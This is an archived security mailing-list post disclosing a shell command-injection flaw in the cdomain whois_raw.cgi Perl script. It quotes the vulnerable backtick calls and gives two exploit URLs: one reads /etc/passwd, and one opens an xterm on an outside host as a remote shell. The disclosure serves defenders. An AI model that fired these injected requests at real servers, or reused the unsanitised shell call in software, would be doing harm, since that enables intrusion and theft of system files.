Hi, sorry if this has already been known. There is a problem in whois_raw.cgi, called from whois.cgi. whois_raw.cgi is part of cdomain v1.0. I don't know if new versions are vulnerable. #!/usr/bin/perl # # whois_raw.cgi Written by J. Allen Hatch (zoneat_private) # 04/17/97 # # This script is part of the cdomain v1.0 package which is available at: # http://www.your-site.com/~zone/whois.html ... require ("/usr/lib/perl5/cgi-lib.pl"); ... $fqdn = $in{'fqdn'}; # Fetch the root name and concatenate # Fire off whois if ($in{'root'} eq "it") { @result=`$whois_cmd_it $fqdn`; } elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") { @result="Dettagli non disponibili per il dominio richiesto."; } else { @result=`$whois_cmd $fqdn`; } ... The exploit is banal and well known problem: http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0 bye, antirez -- Salvatore Sanfilippo antirez | md5330at_private | antirezat_private try hping: http://www.kyuzz.org/antirez antirezat_private 'se la barca non ce l'hai dove uzba te ne vai? se la barca te la ruba, preo.' (M. Abruscato & O. Carmeci)
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:48:02 PDT